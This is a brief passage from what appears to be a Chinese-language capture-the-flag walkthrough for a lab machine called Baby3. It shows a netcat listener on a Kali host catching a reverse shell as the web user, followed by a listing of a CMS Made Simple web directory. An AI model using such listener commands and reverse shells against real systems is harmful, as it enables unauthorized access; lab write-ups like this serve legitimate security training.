┌──(root㉿kali)-[/home/kali] └─# nc -lnvp 7777 listening on [any] 7777 ... connect to [192.168.56.102] from (UNKNOWN) [192.168.56.111] 56342 bash: cannot set terminal process group (422): Inappropriate ioctl for device bash: no job control in this shell www-data@Baby3:/var/www/baby3.dsz/uploads$
成功弹到shell
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
www-data@Baby3:/var/www/baby3.dsz$ ls -lt ls -lt total 7900 drwxr-xr-x 6 www-data www-data 4096 Oct 22 04:39 uploads -rw-r--r-- 1 www-data www-data 12386 Oct 17 22:04 index.php -r--r--r-- 1 www-data www-data 379 Oct 17 22:03 config.php drwxr-xr-x 9 www-data www-data 4096 Oct 17 22:03 assets drwxr-xr-x 4 www-data www-data 4096 Oct 17 22:03 tmp drwxr-xr-x 2 www-data www-data 4096 Oct 17 22:03 doc drwxr-xr-x 12 www-data www-data 4096 Oct 17 22:03 lib drwxr-xr-x 15 www-data www-data 4096 Oct 17 22:03 modules -rw-r--r-- 1 www-data www-data 1359 Oct 17 22:03 moduleinterface.php -rw-r--r-- 1 www-data www-data 1150 Oct 17 22:03 favicon_cms.ico drwxr-xr-x 6 www-data www-data 4096 Oct 17 22:03 admin -rwxr-xr-x 1 www-data www-data 8029730 Oct 17 21:59 cmsms-2.2.22-install.php